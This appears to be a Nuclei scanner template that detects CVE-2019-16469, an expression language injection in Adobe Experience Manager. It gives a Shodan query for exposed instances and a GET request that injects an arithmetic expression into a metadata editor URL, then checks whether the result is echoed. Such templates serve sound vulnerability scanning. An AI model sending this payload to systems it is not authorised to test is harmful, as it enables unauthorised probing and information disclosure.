id: CVE-2019-16469 info: name: Adobe Experience Manager - Expression Language Injection author: DomenicoVeneziano severity: high description: | Adobe Experience Manager versions 6.5, 6.4, 6.3, 6.2, 6.1, and 6.0 has an expression language injection vulnerability. impact: | Successful exploitation could lead to sensitive information disclosure remediation: | To fix the vulnerability, it is necessary to update the Adobe AEM instance using the Service Pack 6.5.3.0 reference: - https://nozero.io/en/cve-2019-16469-adobe-aem-expression-language-injection/ - https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection - https://nvd.nist.gov/vuln/detail/CVE-2019-16469 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-16469 cwe-id: CWE-917 epss-score: 0.00373 epss-percentile: 0.69903 cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" tags: cve,cve2019,aem,eli,csti variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" result: "{{to_number(num1)*to_number(num2)}}" http: - method: GET path: - '{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d' matchers-condition: and matchers: - type: word part: body words: - 'data-formid="{{result}}"' - 'Embed Code' condition: and - type: status status: - 200 # digest: 490a0046304402201c54f3f8da2d2dfeb9b117ff47cd8aada9e698cbf4a4282abdc2b09af39a297b02207c82e6550d23da580e35f2fd22109e1126be33fb96f4d508e9aba8a256618b7c:922c64590222798bb761d5b6d8e72950